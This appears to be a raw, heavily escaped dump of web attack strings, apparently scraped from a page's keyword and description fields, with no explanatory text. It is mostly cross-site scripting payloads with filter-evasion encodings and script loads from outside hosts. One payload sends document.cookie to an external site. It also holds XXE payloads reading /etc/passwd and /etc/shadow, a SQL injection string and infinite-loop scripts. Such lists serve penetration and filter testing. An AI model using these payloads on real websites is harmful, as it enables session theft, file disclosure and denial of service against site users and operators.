SRC=\\\";javascript:alert(\\\';XSS\\\';)\\\";\\r\\n<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;\\r\\n<;<;SCRIPT>;alert(\\\";XSS\\\";);//<;<;/SCRIPT>;\\r\\n<;IMG \\\";\\\";\\\";>;<;SCRIPT>;alert(\\\";XSS\\\";)<;/SCRIPT>;\\\";>;\\r\\n<;SCRIPT>;a=/XSS/\\r\\n<;SCRIPT a=\\\";>;\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT =\\\";blah\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT a=\\\";blah\\\"; \\\';\\\'; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT \\\";a=\\\';>;\\\';\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT a=`>;` SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT>;document.write(\\\";<;SCRI\\\";);<;/SCRIPT>;PT SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;SCRIPT a=\\\";>\\\';>\\\"; SRC=\\\";http://ha.ckers.org/xss.js\\\";>;<;/SCRIPT>;\\r\\n<;A HREF=\\\";http://66.102.7.147/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://1113982867/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://0x42.0x0000066.0x7.0x93/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://0102.0146.0007.00000223/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";//www.google.com/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";//google\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://ha.ckers.org@google\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://google:ha.ckers.org\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://google.com/\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.google.com./\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";javascript:document.location=\\\';http://www.google.com/\\\';\\\";>;XSS<;/A>;\\r\\n<;A HREF=\\\";http://www.gohttp://www.google.com/ogle.com/\\\";>;XSS<;/A>;\\r\\n<script>document.vulnerable=true;</script>\\r\\n<img SRC=\\\"jav ascript:document.vulnerable=true;\\\">\\r\\n<img SRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<img SRC=\\\" &#14; javascript:document.vulnerable=true;\\\">\\r\\n<body onload!#$%&()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;>\\r\\n<<SCRIPT>document.vulnerable=true;//<</SCRIPT>\\r\\n<script <B>document.vulnerable=true;</script>\\r\\n<img SRC=\\\"javascript:document.vulnerable=true;\\\"\\r\\n<iframe src=\\\"javascript:document.vulnerable=true; <\\r\\n<script>a=/XSS/\\\\ndocument.vulnerable=true;</script>\\r\\n\\\\\\\";document.vulnerable=true;;//\\r\\n</title><SCRIPT>document.vulnerable=true;</script>\\r\\n<input TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<body BACKGROUND=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<body ONLOAD=document.vulnerable=true;>\\r\\n<img DYNSRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<img LOWSRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<bgsound SRC=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<br SIZE=\\\"&{document.vulnerable=true}\\\">\\r\\n<LAYER SRC=\\\"javascript:document.vulnerable=true;\\\"></LAYER>\\r\\n<link REL=\\\"stylesheet\\\" HREF=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<style>li {list-style-image: url(\\\"javascript:document.vulnerable=true;\\\");</STYLE><UL><LI>XSS\\r\\n<img SRC=\\\'vbscript:document.vulnerable=true;\\\'>\\r\\n1script3document.vulnerable=true;1/script3\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:document.vulnerable=true;\\\">\\r\\n<meta HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:document.vulnerable=true;\\\">\\r\\n<IFRAME SRC=\\\"javascript:document.vulnerable=true;\\\"></iframe>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:document.vulnerable=true;\\\"></frameset>\\r\\n<table BACKGROUND=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<table><TD BACKGROUND=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<div STYLE=\\\"background-image: url(javascript:document.vulnerable=true;)\\\">\\r\\n<div STYLE=\\\"background-image: url(&#1;javascript:document.vulnerable=true;)\\\">\\r\\n<div STYLE=\\\"width: expression(document.vulnerable=true);\\\">\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\';</style>\\r\\n<img STYLE=\\\"xss:expr/*XSS*/ession(document.vulnerable=true)\\\">\\r\\n<XSS STYLE=\\\"xss:expression(document.vulnerable=true)\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\'>\\r\\n<style TYPE=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<style>.XSS{background-image:url(\\\"javascript:document.vulnerable=true\\\");}</STYLE><A CLASS=XSS></a>\\r\\n<style type=\\\"text/css\\\">BODY{background:url(\\\"javascript:document.vulnerable=true\\\")}</style>\\r\\n<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->\\r\\n<base HREF=\\\"javascript:document.vulnerable=true;//\\\">\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>\\r\\n<XML ID=I><X><C><![<IMG SRC=\\\"javas]]<![cript:document.vulnerable=true;\\\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\\r\\n<XML ID=\\\"xss\\\"><I><B><IMG SRC=\\\"javas<!-- -->cript:document.vulnerable=true\\\"></B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></span>\\r\\n<html><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>\\\"></BODY></html>\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>document.vulnerable=true</SCRIPT>\\\'); ?>\\r\\n<meta HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=<SCRIPT>document.vulnerable=true</SCRIPT>\\\">\\r\\n<head><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\\r\\n<a href=\\\"javascript#document.vulnerable=true;\\\">\\r\\n<div onmouseover=\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<img dynsrc=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<input type=\\\"image\\\" dynsrc=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<bgsound src=\\\"javascript:document.vulnerable=true;\\\">\\r\\n&<script>document.vulnerable=true;</script>\\r\\n&{document.vulnerable=true;};\\r\\n<img src=&{document.vulnerable=true;};>\\r\\n<link rel=\\\"stylesheet\\\" href=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<iframe src=\\\"vbscript:document.vulnerable=true;\\\">\\r\\n<img src=\\\"mocha:document.vulnerable=true;\\\">\\r\\n<img src=\\\"livescript:document.vulnerable=true;\\\">\\r\\n<a href=\\\"about:<script>document.vulnerable=true;</script>\\\">\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=javascript:document.vulnerable=true;\\\">\\r\\n<body onload=\\\"document.vulnerable=true;\\\">\\r\\n<div style=\\\"background-image: url(javascript:document.vulnerable=true;);\\\">\\r\\n<div style=\\\"behaviour: url([link to code]);\\\">\\r\\n<div style=\\\"binding: url([link to code]);\\\">\\r\\n<div style=\\\"width: expression(document.vulnerable=true;);\\\">\\r\\n<style type=\\\"text/javascript\\\">document.vulnerable=true;</style>\\r\\n<object classid=\\\"clsid:...\\\" codebase=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<style><!--</style><script>document.vulnerable=true;//--></script>\\r\\n<<script>document.vulnerable=true;</script>\\r\\n<![<!--]]<script>document.vulnerable=true;//--></script>\\r\\n<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->\\r\\n<img src=\\\"blah\\\"onmouseover=\\\"document.vulnerable=true;\\\">\\r\\n<img src=\\\"blah>\\\" onmouseover=\\\"document.vulnerable=true;\\\">\\r\\n<xml src=\\\"javascript:document.vulnerable=true;\\\">\\r\\n<xml id=\\\"X\\\"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>\\r\\n<div datafld=\\\"b\\\" dataformatas=\\\"html\\\" datasrc=\\\"#X\\\"></div>\\r\\n[\\\\xC0][\\\\xBC]script>document.vulnerable=true;[\\\\xC0][\\\\xBC]/script>\\r\\n<style>@import\\\'http://www.securitycompass.com/xss.css\\\';</style>\\r\\n<meta HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\\\">\\r\\n<style>BODY{-moz-binding:url(\\\"http://www.securitycompass.com/xssmoz.xml#xss\\\")}</style>\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://www.securitycompass.com/scriptlet.html\\\"></object>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"http://www.securitycompass.com/xss.htc\\\"><xss:xss>XSS</xss:xss></html>\\r\\n<script SRC=\\\"http://www.securitycompass.com/xss.jpg\\\"></script>\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>\\\'\\\"-->\\r\\n<script a=\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script =\\\">\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script a=\\\">\\\" \\\'\\\' SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script \\\"a=\\\'>\\\'\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script a=`>` SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script a=\\\">\\\'>\\\" SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<script>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://www.securitycompass.com/xss.js\\\"></script>\\r\\n<div style=\\\"binding: url(http://www.securitycompass.com/xss.js);\\\"> [Mozilla]\\r\\n\\\";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\";XSS\\\";)>;\\r\\n<;/script>;<;script>;alert(1)<;/script>;\\r\\n<;/br style=a:expression(alert())>;\\r\\n<;scrscriptipt>;alert(1)<;/scrscriptipt>;\\r\\n<;br size=\\\\\\\";&;{alert(&#039;XSS&#039;)}\\\\\\\";>;\\r\\nperl -e &#039;print \\\\\\\";<;IMG SRC=java\\\\0script:alert(\\\\\\\";XSS\\\\\\\";)>;\\\\\\\";;&#039; >; out\\r\\nperl -e &#039;print \\\\\\\";<;SCR\\\\0IPT>;alert(\\\\\\\";XSS\\\\\\\";)<;/SCR\\\\0IPT>;\\\\\\\";;&#039; >; out\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\\\"http://www.procheckup.com/?sid=\\\"%2bdocument.cookie)>\\r\\n<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n<~/XSS STYLE=xss:expression(alert(\\\'XSS\\\'))>\\r\\n\\\"><script>alert(\\\'XSS\\\')</script>\\r\\n</XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\'XSS\\\'))>\\r\\n</XSS STYLE=xss:expression(alert(\\\'XSS\\\'))>\\r\\n>\\\"><script>alert(\\\"XSS\\\")</script>&\\r\\n\\\"><STYLE>@import\\\"javascript:alert(\\\'XSS\\\')\\\";</STYLE>\\r\\n>\\\"\\\'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>\\r\\n>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>\\r\\n\\\'%uff1cscript%uff1ealert(\\\'XSS\\\')%uff1c/script%uff1e\\\'\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=JaVaScRiPt:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>\\r\\n<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>\\r\\n<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> \\r\\n<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<IMG SRC=\\\"jav&#x0A;ascript:alert(<WBR>\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0D;ascript:alert(<WBR>\\\'XSS\\\');\\\">\\r\\n<![CDATA[<script>var n=0;while(true){n++;}</script>]]>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(\\\'gotcha\\\');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><foo><![CDATA[\\\' or 1=1 or \\\'\\\'=\\\']]></foof>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file://c:/boot.ini\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///etc/passwd\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///etc/shadow\\\">]><foo>&xee;</foo>\\r\\n<?xml version=\\\"1.0\\\" encoding=\\\"ISO-8859-1\\\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \\\"file:///dev/random\\\">]><foo>&xee;</foo>\\r\\n<script>alert(\\\'XSS\\\')</script>\\r\\n%3cscript%3ealert(\\\'XSS\\\')%3c/script%3e\\r\\n%22%3e%3cscript%3ealert(\\\'XSS\\\')%3c/script%3e\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')> \\r\\n<img src=xss onerror=alert(1)>\\r\\n<IMG \\\"\\\"\\\"><SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\">\\r\\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=\\\"jav ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x09;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\\r\\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\\r\\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<BODY BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<BODY ONLOAD=alert(\\\'XSS\\\')>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\')\\\"\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\n<<SCRIPT>alert(\\\"XSS\\\");//<</SCRIPT>\\r\\n%253cscript%253ealert(1)%253c/script%253e\\r\\n\\\"><s\\\"%2b\\\"cript>alert(document.cookie)</script>\\r\\nfoo<script>alert(1)</script>\\r\\n<scr<script>ipt>alert(1)</scr</script>ipt>\\r\\n<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//\\\\\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n<marquee onstart=\\\'javascript:alert(\\\'1\\\');\\\'>=(◕_◕)=

keyword(s): 11

description: <body =\\\"while(true) alert(\\\'XSS\\\');\\\">\\r\\n\\\'\\\"></title>alert(1111)\\r\\n</textarea>\\\'\\\">alert()\\r\\n\\\'\\\"\\\"><script language=\\\"JavaScript\\\"> alert(\\\'X \\\\nS \\\\nS\\\');\\r\\n<<<<>>>><<alert(123)\\r\\n<html><noalert><noscript>(123)</noscript>(123)\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n\\\'></select>alert(123)\\r\\n\\\'>\\\"><script src = \\\'http://www.site.com/XSS.js\\\'>\\r\\n}</style>a=eval;b=alert;a(b(/XSS/.source));\\r\\n(\\\"XSS\\\");\\r\\na=\\\"get\\\";b=\\\"URL\\\";c=\\\"\\\";d=\\\"alert(\\\'xss\\\');\\\";eval(a+b+c+d);\\r\\n=\\\'>alert(\\\"xss\\\")\\r\\n<script+src=\\\">\\\"+src=\\\"http://yoursite.com/xss.js?69,69\\\">\\r\\n<body background=\\\'\\\">alert(navigator.userAgent)></body>\\r\\n\\\">/XaDoS/>alert()<script src=\\\"http://www.site.com/XSS.js\\\">\\r\\n\\\">/KinG-InFeT.NeT/>alert()\\r\\nsrc=\\\"http://www.site.com/XSS.js\\\">\\r\\nIj48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\\r\\n!--\\\" />alert(\\\'xss\\\');\\r\\nalert(\\\"XSS by \\\\nxss\\\")<marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\">alert(\\\"XSS by \\\\nxss\\\")><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\'\\\"></title>alert(\\\"XSS by \\\\nxss\\\")><marquee><h1>XSS by xss</h1></marquee>\\r\\n<img \\\"\\\"\\\">alert(\\\"XSS by \\\\nxss\\\")<marquee><h1>XSS by xss</h1></marquee>\\r\\nalert(1337)<marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\">alert(1337)\\\">alert(\\\"XSS by \\\\nxss</h1></marquee>\\r\\n\\\'\\\"></title>alert(1337)><marquee><h1>XSS by xss</h1></marquee>\\r\\n<iframe src=\\\"(\\\'XSS by \\\\nxss\\\');\\\"></iframe><marquee><h1>XSS by xss</h1></marquee>\\r\\n\\\'>alert(String.fromCharCode(88,83,83))<img src=\\\"\\\" alt=\\\'\\r\\n\\\">alert(String.fromCharCode(88,83,83))<img src=\\\"\\\" alt=\\\"\\r\\n\\\\\\\'>alert(String.fromCharCode(88,83,83))<img src=\\\"\\\" alt=\\\\\\\'\\r\\nhttp://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??\\r\\nhttp://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??\\r\\n\\\'); alert(\\\'xss\\\'); var x=\\\'\\r\\n\\\\\\\\\\\'); alert(\\\\\\\'xss\\\\\\\');var x=\\\\\\\'\\r\\n//-->alert(String.fromCharCode(88,83,83));\\r\\n>\\\"><ScRiPt%20%0a%0d>alert(561177485777)%3B\\r\\n<img src=\\\"Mario Heiderich says that svg SHOULD not be executed trough image tags\\\" =\\\"(\\\'\\\\u003c\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u0020\\\\u0073\\\\u0072\\\\u0063\\\\u003d\\\\u0022\\\\u0064\\\\u0061\\\\u0074\\\\u0061\\\\u003a\\\\u0069\\\\u006d\\\\u0061\\\\u0067\\\\u0065\\\\u002f\\\\u0073\\\\u0076\\\\u0067\\\\u002b\\\\u0078\\\\u006d\\\\u006c\\\\u003b\\\\u0062\\\\u0061\\\\u0073\\\\u0065\\\\u0036\\\\u0034\\\\u002c\\\\u0050\\\\u0048\\\\u004e\\\\u0032\\\\u005a\\\\u0079\\\\u0042\\\\u0034\\\\u0062\\\\u0057\\\\u0078\\\\u0075\\\\u0063\\\\u007a\\\\u0030\\\\u0069\\\\u0061\\\\u0048\\\\u0052\\\\u0030\\\\u0063\\\\u0044\\\\u006f\\\\u0076\\\\u004c\\\\u0033\\\\u0064\\\\u0033\\\\u0064\\\\u0079\\\\u0035\\\\u0033\\\\u004d\\\\u0079\\\\u0035\\\\u0076\\\\u0063\\\\u006d\\\\u0063\\\\u0076\\\\u004d\\\\u006a\\\\u0041\\\\u0077\\\\u004d\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0069\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u0070\\\\u0062\\\\u0057\\\\u0046\\\\u006e\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0045\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0032\\\\u006c\\\\u0074\\\\u0059\\\\u0057\\\\u0064\\\\u006c\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0067\\\\u0062\\\\u0032\\\\u0035\\\\u0073\\\\u0062\\\\u0032\\\\u0046\\\\u006b\\\\u0050\\\\u0053\\\\u004a\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u0079\\\\u004b\\\\u0053\\\\u0049\\\\u002b\\\\u0050\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0048\\\\u004e\\\\u006a\\\\u0063\\\\u006d\\\\u006c\\\\u0077\\\\u0064\\\\u0044\\\\u0035\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u007a\\\\u004b\\\\u0054\\\\u0077\\\\u0076\\\\u0063\\\\u0032\\\\u004e\\\\u0079\\\\u0061\\\\u0058\\\\u0042\\\\u0030\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u006b\\\\u005a\\\\u0057\\\\u005a\\\\u007a\\\\u0049\\\\u0047\\\\u0039\\\\u0075\\\\u0062\\\\u0047\\\\u0039\\\\u0068\\\\u005a\\\\u0044\\\\u0030\\\\u0069\\\\u0059\\\\u0057\\\\u0078\\\\u006c\\\\u0063\\\\u006e\\\\u0051\\\\u006f\\\\u004e\\\\u0043\\\\u006b\\\\u0069\\\\u0050\\\\u006a\\\\u0077\\\\u0076\\\\u005a\\\\u0047\\\\u0056\\\\u006d\\\\u0063\\\\u007a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u005a\\\\u0079\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0055\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0047\\\\u004e\\\\u0070\\\\u0063\\\\u006d\\\\u004e\\\\u0073\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0059\\\\u0070\\\\u0049\\\\u0069\\\\u0041\\\\u0076\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u0064\\\\u0047\\\\u0056\\\\u0034\\\\u0064\\\\u0043\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0063\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0033\\\\u0052\\\\u006c\\\\u0065\\\\u0048\\\\u0051\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0043\\\\u0039\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u006a\\\\u0077\\\\u0076\\\\u0063\\\\u0033\\\\u005a\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0022\\\\u003e\\\\u003c\\\\u002f\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u003e\\\');\\\"></img>\\r\\n</body>\\r\\n</html>\\r\\n<SCRIPT SRC=http://hacker-site.com/xss.js>\\r\\n alert(“XSS”); \\r\\n<BODY =alert(\\\"XSS\\\")>\\r\\n<BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\">\\r\\n<IMG SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<IMG DYNSRC=\\\"(\\\'XSS\\\')\\\">\\r\\n<IMG LOWSRC=\\\"(\\\'XSS\\\')\\\">\\r\\n<IFRAME SRC=”http://hacker-site.com/xss.html”>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" 